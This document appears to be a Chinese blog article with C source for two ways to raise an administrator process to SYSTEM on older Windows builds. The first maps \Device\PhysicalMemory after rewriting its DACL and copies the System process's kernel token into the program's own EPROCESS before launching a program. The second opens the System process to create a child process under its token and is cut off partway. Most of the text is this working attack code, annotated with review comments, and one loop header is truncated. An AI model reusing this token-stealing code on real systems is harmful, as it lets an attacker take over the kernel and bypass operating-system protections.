管理员组获取系统权限的完美解决方案
{
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
// Opens the \Device\PhysicalMemory section into the global g_hMPM with
// read/write map access and maps one 0x1000-byte view of physical address
// 0x30000 into g_pMapPhysicalMemory. LinearToPhys() below indexes that view
// as a page directory, so 0x30000 is presumably the page-directory base of
// the OS build this was written for — it is not computed here; TODO confirm.
// Returns g_hMPM on success, NULL when the section cannot be opened or mapped.
// On the map failure path g_hMPM is left open (not closed).
// Note: since Windows XP SP2 / Server 2003 SP1 user-mode opens of this section
// are refused outright, so on those builds the retry below fails as well.
// A process opening this section with WRITE_DAC and rewriting its DACL is a
// high-signal event for defenders; the Win32/native mix (CloseHandle on a
// ZwOpenSection handle) works because both use the same handle table.
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
// Minimal OBJECT_ATTRIBUTES: absolute name, no root directory, Attributes = 0
// (no OBJ_CASE_INSENSITIVE, so the name must match the object's case exactly).
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
// Write access was denied: reopen with READ_CONTROL|WRITE_DAC, rewrite the
// section's DACL (SetPhyscialMemorySectionCanBeWrited — presumably the
// function whose tail is visible above this one), close, and retry with
// map-write access.
// NOTE(review): neither the WRITE_DAC open nor the DACL rewrite is checked
// before the handle is used; only the final retry's status is tested below.
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL;
}
// MapViewOfFile(hMapping, dwDesiredAccess, dwOffsetHigh, dwOffsetLow, cbMap)
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4, // FILE_MAP_READ (numeric value used directly)
0,
0x30000, // physical offset to map — see header comment
0x1000); // one 4 KB page
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
// Translates a 32-bit virtual address to a physical address by walking the
// page tables by hand through the \Device\PhysicalMemory section (g_hMPM).
// BaseAddress: the mapped page directory (callers pass g_pMapPhysicalMemory),
//              read as four-byte entries indexed by the top 10 address bits —
//              i.e. 32-bit non-PAE paging. PAE (8-byte entries, 9/9/12 split)
//              is not handled by these masks and shifts.
// addr:        virtual address to translate.
// Returns the physical address, or 0 when the directory or table entry is
// not present (bit 0 clear). 0 is also a legal physical address, so callers
// cannot tell "not present" from "page 0"; GetData()/SetData() never check.
PVOID LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
// 0x80000000..0x9FFFFFFF is treated as a direct 1:1 mapping of physical
// memory (phys = virt - 0x80000000) and skips the table walk entirely.
// NOTE(review): this shortcut holds only for the OS builds/memory layouts
// the author targeted — confirm before relying on it elsewhere.
if(VAddr>=0x80000000 && VAddr<0xa0000000)
{
PAddr=VAddr-0x80000000;
return (PVOID)PAddr;
}
// Page-directory entry: top 10 bits of the virtual address.
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0) // bit 0: entry present
{
ULONG tmp=PGDE&0x00000080; // bit 7: 4 MB (large) page
if (tmp!=0)
{
// Large page: bits 31..22 of the PDE are the frame, low 22 bits the offset.
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
// Map the 4 KB page-table page named by the PDE (frame = PGDE & ~0xFFF)
// out of physical memory, then select the PTE with bits 21..12 of VAddr.
// NOTE(review): a NULL return from MapViewOfFile is not checked — PGDE
// becomes 0 and the next line dereferences it.
PGDE=(ULONG)MapViewOfFile(g_hMPM, FILE_MAP_ALL_ACCESS, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0) // PTE present
{
// Frame from bits 31..12 of the PTE, plus the low 12 bits of VAddr.
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0; // NOTE(review): returns with the page-table view still mapped (leak).
}
}
else return 0;
return (PVOID)PAddr;
}
// Reads one ULONG at kernel virtual address addr through physical memory:
// translates addr with LinearToPhys(), maps the 4 KB physical page holding it
// read-only (4 == FILE_MAP_READ), and returns the ULONG at its page offset.
// Returns 0 when the page cannot be mapped — indistinguishable from a stored
// value of 0, so main() cannot tell failure from data.
// NOTE(review): a 0 from LinearToPhys (entry not present) is not checked
// here, so a failed translation silently reads physical page 0.
ULONG GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
// Offset within the page, in ULONG units.
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
// Writes one ULONG to kernel virtual address addr through physical memory:
// translates addr with LinearToPhys(), maps the 4 KB physical page holding it
// with FILE_MAP_WRITE, and stores data at its page offset.
// Returns FALSE only when the page cannot be mapped; TRUE otherwise.
// NOTE(review): as in GetData(), a 0 (failed) translation is not checked and
// results in a write into physical page 0.
BOOL SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
// Offset within the page, in ULONG units.
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
// Returns the kernel load address (Base) of the first loaded module whose
// ImageName contains pModuleName as a substring, using
// ZwQuerySystemInformation(SystemModuleInformation); 0 when not found or on
// failure. The buffer layout assumed here is a ULONG record count followed by
// an array of SYSTEM_MODULE_INFORMATION (declared elsewhere in this file).
// NOTE(review): strstr() is a substring match, so any module whose path
// contains pModuleName can be returned; the first hit wins.
// NOTE(review): the function returns NULL (a pointer constant) from a DWORD
// function; the value is 0 either way.
DWORD MyGetModuleBaseAddress( char * pModuleName)
{
PSYSTEM_MODULE_INFORMATION pSysModule;
ULONG uReturn;
ULONG uCount;
PCHAR pBuffer = NULL;
PCHAR pName = NULL;
NTSTATUS status;
UINT ui;
CHAR szBuffer[10];
DWORD pBaseAddress;
// First call with a deliberately tiny buffer, only to learn the required
// length in uReturn; the status is ignored.
// NOTE(review): uReturn is uninitialized if this call does not set it, so the
// malloc() below may be sized from garbage.
status = ZwQuerySystemInformation( SystemModuleInformation, szBuffer, 10, &uReturn );
pBuffer = ( PCHAR )malloc(uReturn);
if ( pBuffer )
{
// Second call with the full-size buffer.
status = ZwQuerySystemInformation( SystemModuleInformation, pBuffer, uReturn, &uReturn );
if( NT_SUCCESS(status) )
{
// Record count, then the module records immediately after it.
uCount = ( ULONG )*( ( ULONG * )pBuffer );
pSysModule = ( PSYSTEM_MODULE_INFORMATION )( pBuffer + sizeof( ULONG ) );
for ( ui = 0; ui < uCount; ui++ )
{
pName = strstr( pSysModule->ImageName, pModuleName );
if( pName )
{
pBaseAddress = (DWORD)pSysModule->Base;
free( pBuffer );
return pBaseAddress;
}
pSysModule ++;
}
}
free( pBuffer );
}
return NULL;
}
// Finds the kernel EPROCESS address of process PID by scanning the system
// handle list (ZwQuerySystemInformation(SystemHandleInformation)) for a handle
// owned by PID whose ObjectTypeNumber is 5, and returning that entry's kernel
// Object pointer. Returns 0 (written as FALSE) on failure or when no such
// handle exists. main() calls OpenProcess() on itself right before calling
// this — presumably so that a handle of that type exists in its own table.
// NOTE(review): ObjectTypeNumber == 5 is a hard-coded type index assumed to
// be the Process object type on the targeted OS build; type indexes differ
// between Windows versions — TODO confirm for the build in use.
DWORD GetEprocessFromId (DWORD PID)
{
NTSTATUS status;
PVOID buf = NULL;
ULONG size = 1; // not used
ULONG NumOfHandle = 0;
ULONG i;
PSYSTEM_HANDLE_INFORMATION h_info = NULL;
DWORD n;
DWORD retvalue=0;
buf=malloc(0x1000);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
// First attempt with a fixed 0x1000-byte buffer; the expected outcome is
// STATUS_INFO_LENGTH_MISMATCH with the required size returned in n.
status = ZwQuerySystemInformation( SystemHandleInformation, buf, 0x1000, &n );
if(STATUS_INFO_LENGTH_MISMATCH == status)
{
free(buf);
buf=malloc(n);
if(buf == NULL)
{
printf("malloc wrong\n");
return FALSE;
}
// NOTE(review): the status of this second call is not checked before the
// buffer is parsed below.
status = ZwQuerySystemInformation( SystemHandleInformation, buf, n, NULL);
}
else
{
// NOTE(review): a first call that succeeds outright (buffer large enough)
// also lands here and is reported as an error; buf is leaked on this path.
printf("ZwQuerySystemInformation wrong\n");
return FALSE;
}
// Layout: ULONG handle count, then an array of SYSTEM_HANDLE_INFORMATION
// entries (struct declared elsewhere in this file).
NumOfHandle = *(ULONG*)buf;
h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);
// NOTE(review): the loop header on the next line is truncated in this copy of
// the source (condition and increment are missing) and will not compile as
// shown; NumOfHandle is assigned above and otherwise unused, so the loop
// presumably ran i over 0..NumOfHandle-1.
for(i = 0; i
if( h_info[i].ProcessId == PID &&( h_info[i].ObjectTypeNumber == 5 ))
{
retvalue=(DWORD)(h_info[i].Object);
break;
}
}
if ( buf != NULL )
{
free( buf );
}
return retvalue;
}
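/*
 * Prints the command-line synopsis.
 * @param exe  argv[0] of the running program, substituted for %s. It must be
 *             passed: a %s with no matching argument is undefined behaviour
 *             (printf reads whatever happens to be in the vararg slot).
 */
void usage(char *exe)
{
	printf("Usage : %s [exefile|-h]\n", exe);
}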
// Entry point. Reads the System process's Token pointer (EPROCESS+TOKEN_OFFSET)
// through physical memory, writes it into this process's own EPROCESS, and
// then launches argv[1] (default: regedit.exe) from the now-SYSTEM process.
// argv[1]: optional program to launch; "-h", or more than one argument, prints
// usage and exits. Returns 0; exits with -1 when setup fails.
// TOKEN_OFFSET is the EPROCESS.Token offset and is OS-build specific (the
// article text says to set it for your own version); with a wrong value
// GetData()/SetData() silently read and write some other field.
// From a defender's view: a non-SYSTEM process whose token suddenly belongs to
// SYSTEM, and the \Device\PhysicalMemory DACL rewrite in OpenPhysicalMemory(),
// are the observable artifacts of this technique.
int main(int argc, char **argv)
{
HMODULE hDll;
DWORD tmp;
DWORD SystemEprocess;
DWORD SystemEprocessTokenValue;
DWORD CurrentEprocess;
DWORD CurrentEprocessTokenValue;
printf("\nIt is intended to get SYSTEM privilege from administrators group.\n");
printf("\tMade by ZwelL.\n");
printf("\tZwell@sohu.com.\n");
printf("\thttp://www.donews.net/zwell.\n");
// NOTE(review): argv[0] is passed but the format has no %s (harmless); the
// mirror-image defect is in usage(), which has a %s but passes no argument.
printf("\tType -h to get more information\n", argv[0]);
if( argc>=2)
{
if(
( (strcmp(argv[1],"-h")==0) && (argc==2))
|| (argc>2)
)
{
usage(argv[0]);
exit(-1);
}
}
// InitNTDLL/CloseNTDLL are defined elsewhere in this file (presumably they
// resolve the Zw* / Rtl* entry points used above).
if (!InitNTDLL())
{
printf("InitNTDLL wrong\n");
exit(-1);
}
if (OpenPhysicalMemory()==0)
{
printf("OpenPhysicalMemory wrong\n");
exit(-1);
}
// Kernel address of the PsInitialSystemProcess export: load ntoskrnl.exe as an
// ordinary user-mode module to get the export's RVA (GetProcAddress value
// minus hDll), then add the real kernel base from the loaded-module list.
// NOTE(review): neither LoadLibrary nor GetProcAddress is checked; a NULL
// hDll/tmp produces a bogus address that is then read through GetData().
hDll = LoadLibrary("ntoskrnl.exe");
tmp = (DWORD)GetProcAddress(hDll, "PsInitialSystemProcess");
tmp=MyGetModuleBaseAddress("ntoskrnl.exe")+(DWORD)tmp-(DWORD)hDll;
// PsInitialSystemProcess holds the EPROCESS pointer of the System process.
SystemEprocess=GetData((PVOID)tmp);
tmp=SystemEprocess+TOKEN_OFFSET; //SYSTEM's Token address
SystemEprocessTokenValue=GetData((PVOID)tmp); //SYSTEM's Token
printf("System Process Token : 0x%08X\n", SystemEprocessTokenValue);
// The handle returned here is discarded and never closed; presumably the
// point is only to put a Process-type handle into this process's handle table
// so GetEprocessFromId() can locate its own EPROCESS.
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
CurrentEprocess = GetEprocessFromId(GetCurrentProcessId());
CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));
printf("Current EPROCESS : %08x\n", CurrentEprocess);
printf("Current Process Token : %08x\nPress ENTER to continue...\n",
CurrentEprocessTokenValue);
//getchar();
// Overwrite this process's Token pointer with SYSTEM's.
// NOTE(review): nothing checks that CurrentEprocess or SystemEprocess is
// non-zero (both lookups return 0 on failure), so a failed lookup writes to
// whatever 0+TOKEN_OFFSET translates to.
SetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET), SystemEprocessTokenValue);
printf("Current Process Token : %08x\n",
GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));
printf("Press ENTER to create process...\n");
//getchar();
// Re-read both Token fields and only spawn when they still agree.
if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))
== GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))
)
// It is so surprised that SYSTEM's Token always in changing.
// So before create new process, we should ensure the TOKEN is all right
{
// Launch argv[1], or regedit.exe when no program was given, from the process
// that now carries the System token.
ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\regedit.exe", NULL, NULL, SW_SHOWNORMAL);
}
// Teardown. The OpenProcess handle above and hDll (LoadLibrary) are not released.
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
return 0;
}
在上面的代码中,请将TOKEN_OFFSET改成你的系统版本的偏移值.我们也可以想象到由于是操作了系统的内核空间,搞不好会出现蓝屏现象(尽管几率很小).
=========================================================================================================
第二种方法,我们不自己创建进程,而是间接用System进程的Token来创建进程.看到这,大家大概又想到了远线程。
这里不是。我的思路是:配置好桌面(desktop),工作区间(WindowStation)等信息,最后调用CreateProcessAsUser来创建子进程。
用这种方法极为稳定。这里一些关于获取SID的代码可以看我前一段时间写的"一种新的穿透防火墙的数据传输技术".
下面是源代码,这段代码也实现了RUNAS的功能,有兴趣可以研究一下,大部分都来自MSDN:
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "wtsapi32")
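/*
 * Locates the "System" process with a Toolhelp snapshot and opens it with
 * PROCESS_QUERY_INFORMATION access.
 * @return an open process handle the caller must CloseHandle(), or NULL when
 *         the snapshot fails, no "System" entry exists, or OpenProcess fails
 *         (a message is printed in each case).
 */
HANDLE OpenSystemProcess()
{
	HANDLE hSnapshot = NULL;
	HANDLE hProc = NULL;
	__try
	{
		// Get a snapshot of the processes in the system
		hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
		if (hSnapshot == NULL)
		{
			printf("OpenSystemProcess CreateToolhelp32Snapshot Failed");
			__leave;
		}
		PROCESSENTRY32 pe32;
		pe32.dwSize = sizeof(pe32);
		// Find the "System" process; lstrcmpi is case-insensitive, so the
		// upper-case literal still matches the "System" entry.
		BOOL fProcess = Process32First(hSnapshot, &pe32);
		while (fProcess && (lstrcmpi(pe32.szExeFile, TEXT("SYSTEM")) != 0))
			fProcess = Process32Next(hSnapshot, &pe32);
		if (!fProcess)
		{
			printf("OpenSystemProcess Not Found SYSTEM");
			__leave; // Didn't find "System" process
		}
		// Open the process with PROCESS_QUERY_INFORMATION access
		hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE,
			pe32.th32ProcessID);
		if (hProc == NULL)
		{
			printf("OpenSystemProcess OpenProcess Failed");
			__leave;
		}
	}
	__finally
	{
		// Cleanup the snapshot. A return statement inside __finally is not
		// permitted during termination handling (MSVC warns about it), so the
		// return is placed after the handler instead of here.
		if (hSnapshot != NULL)
			CloseHandle(hSnapshot);
	}
	return hProc;
}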
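/*
 * Enables one privilege in the current process's primary token.
 * @param name  privilege name as accepted by LookupPrivilegeValue.
 * @return TRUE only when the name resolved, the token was opened, and
 *         AdjustTokenPrivileges left ERROR_SUCCESS as the last error (meaning
 *         the privilege was actually assigned, not merely requested).
 */
BOOL EnablePrivilege (PCSTR name)
{
	HANDLE hToken = NULL;
	BOOL rv = FALSE;
	TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };
	/* An unknown privilege name must not reach AdjustTokenPrivileges with
	   a zero LUID; the original ignored this result. */
	if (!LookupPrivilegeValue (0, name, &priv.Privileges[0].Luid))
		return FALSE;
	/* If the token cannot be opened, hToken is never valid; the original
	   passed an uninitialized handle on to AdjustTokenPrivileges/CloseHandle. */
	if (!OpenProcessToken(GetCurrentProcess (), TOKEN_ADJUST_PRIVILEGES, &hToken))
		return FALSE;
	/* AdjustTokenPrivileges returns TRUE even when nothing was assigned;
	   GetLastError() (ERROR_SUCCESS vs ERROR_NOT_ALL_ASSIGNED) is the real
	   outcome, which is why it is read right after the call. */
	if (AdjustTokenPrivileges (hToken, FALSE, &priv, sizeof priv, 0, 0))
		rv = GetLastError () == ERROR_SUCCESS;
	CloseHandle (hToken);
	return rv;
}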
#define chDIMOF(Array) (sizeof(Array) / sizeof(Array[0]))
BOOL ModifySecurity(HANDLE hProc, DWORD dwAccess)
{
PACL pAcl = NULL;
PACL pNewAcl = NULL;
PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
BOOL fSuccess = TRUE;
PSECURITY_DESCRIPTOR pSD = NULL;
__try
{
// Find the length of the security object for the kernel object
DWORD dwSDLength;
if (GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD, 0,
&dwSDLength) || (GetLastError() != ERROR_INSUFFICIENT_BUFFER))
{
printf("ModifySecurity GetKernelObjectSecurity Size Failed");
__leave;
}
// Allocate a buffer of that length
pSD = LocalAlloc(LPTR, dwSDLength);
if (pSD == NULL)
{
printf("ModifySecurity LocalAlloc Failed");
__leave;
}
// Retrieve the kernel object
if (!GetKernelObjectSecurity(hProc, DACL_SECURITY_INFORMATION, pSD,
dwSDLength, &dwSDLength))
{
printf("ModifySecurity GetKernelObjectSecurity Failed");
__leave;
}
// Get a pointer to the DACL of the SD
BOOL fDaclPresent;
BOOL fDaclDefaulted;
if (!GetSecurityDescriptorDacl(pSD, &fDaclPresent, &pAcl,
&fDaclDefaulted))
{
printf("ModifySecurity GetSecurityDescriptorDacl Failed");
__leave;
}